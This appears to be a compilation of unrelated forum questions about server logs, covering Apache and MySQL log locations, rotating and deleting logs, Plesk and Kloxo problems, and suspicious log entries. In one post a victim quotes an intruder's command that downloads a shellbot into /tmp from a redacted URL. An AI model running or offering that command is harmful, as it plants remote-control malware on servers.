I have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I be best to do to secure my server in this regard? It would have to be writeable for the system to be operational.
Since I took the server, I have been getting a lot of errors in my Apache logs when I run this command in my shell:
Code: tail -f /usr/local/apache/logs/error_log
A lot of errors come in fast and do not stop until I stop Apache:
Code:
[Fri May 29 11:37:52 2009] [error] [client 77.167.228.165] File does not exist: /usr/local/apache/htdocs/40E80014354C4C30365047322020202020202020202020206C0000004D6600000001760000005CEB000530E1E8EEF4
[Fri May 29 11:37:52 2009] [error] [client 89.215.36.123] File does not exist: /usr/local/apache/htdocs/40E80014202020202020465032443031324B3842364842456C000000446600000001760000005CEB000530797F848A
[Fri May 29 11:37:52 2009] [error] [client 93.185.179.132] File does not exist: /usr/local/apache/htdocs/40E800006C000001596600000001760000005CEB0005307587A8B4
Everything is OK, but I need to remove this error and I can't understand where it is coming from: "/usr/local/apache/htdocs"
I am running Plesk on a VPS and a page on one of my websites won't load no matter what I try. I want to view the error logs but am not sure how to go about it on this system...
I want to check error logs in HyperVM on my friend's VPS. As I haven't done this before, I want to know where I can view the error logs.
I am wondering whether there was an error in the installation of Kloxo, as I couldn't find an option to add an IP address in Kloxo, or whether some other error is causing trouble in adding an IP to Kloxo.
After a full year of operation, I think I need to delete some log files. What types of files can I safely delete (and is deletion the best option, i.e. will the files be regenerated from zero length?)
For example, my server's error_log file is 193 Mb and my access_log file is 14 Mb. Can I "rm" them both?
Are there any other such files I can safely delete that occupy space on the server?
I assume they are file requests made from ads on the site.
Right now I've just added those directories and files to appease the error logs, but can I fake their existence somehow without having to clutter up my file structure?
We are running Plesk 12.0.18 update #47 on a CentOS 6.6 VPS.
Suddenly one of the domains hosted has stopped recording the error logs from apache so we can't troubleshoot the web issues. All other hosts are working right.
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code:
Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized
Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved
Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load
Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall
Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting.
Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized
Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved
Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load
My concern is that it says "unable to load iptables module (ip_tables), aborting."
Is there anything that logs server load and what processes have caused any spikes?
One of my servers keeps going down under high load; well, it seems to lock up and the NOC has to reboot it, but of course the techs can't diagnose a problem afterwards as it runs fine, and when I send them a ticket it's because the server can't be reached at all, and then they can't diagnose it either.
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for a while. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
All the logs are in a single file, occupying a huge amount of space on our server. We use lxadmin for the VPS.
We are unable to even open the file, as we have almost run out of space. We would at least like to delete logs older than a month; these logs are from 3 months, so please help us in solving this problem.
If we delete the SQL log, will a new log be created automatically, or will it give an error?
if redhat keeps a log of ip addresses which have logged into the server.
I've got a machine that one of my staff logged into today with the root account, and I'm wondering if I can find out the IP address of the user who logged in as root?
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code: hubberfix
sh -c cd /tmp;lwp-download [url] shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
- exim_mainlog starts at 03/18/2007 (not aware of any rotating log crons)
- grep info@someexternaldomain.com /var/log/exim_mainlog is empty, even after sending to that email from localdomain.com today, a few times
- localdomain.com is found fine in localdomains, trueuserdomains
- localdomain.com sent just fine to another local domain on server plus gmail account. Delivery receipt to both domains plus the info@someexternaldomain.com were "successful"
I've received from info@someexternaldomain.com many times back and forth without issues, yet today nothing shows up in exim_mainlog NOR any other logs inside /var/log
I have Apache making separate log files for each of my virtual hosts and putting them in /home/vhostname/log. Rotatelogs makes a new log every 24 hours, but the logs quickly add up and since the sites are fairly busy the logs are at times over a gb. Is there any way to make rotatelogs delete the log files after two days? Or should I just use newsyslog?
I just have a quick question for the experts here regarding the bin logs that MySQL generates. I have Googled around, tried to understand these logs, and from what I gather, it is a good idea to leave on if you want to do replication in case something happens, or if you have a slave or backup drive and you want to replicate to it.
So, these things seem like a good thing to have. My question is though, do they HAVE to stay there now? I unknowingly enabled these back in May on my CentOS server when I used and then tweaked the my-huge conf file, and there they are ever since. Currently they're sucking down 30GB of my hard disk and it's only 80GB.
It would be good if I could just take say, all the ones that haven't been modified for at least a month or so (there are 30 of them, most of them are stopped at 1GB I believe, that's how it splits them up.) Is moving those to another hard disk say, my 500GB one, an OK thing to do?
It won't affect my currently running MySQL data, right? And the bin logs will still be useful?
I'm sure this question has been asked before, but I'm looking for a nice and simple way of breaking up log files into smaller chunks.
I've been running apache2 on a VPS for the past few months and one of the access.log files is now 700mb big... bit of a waste of space. I'm currently just doing: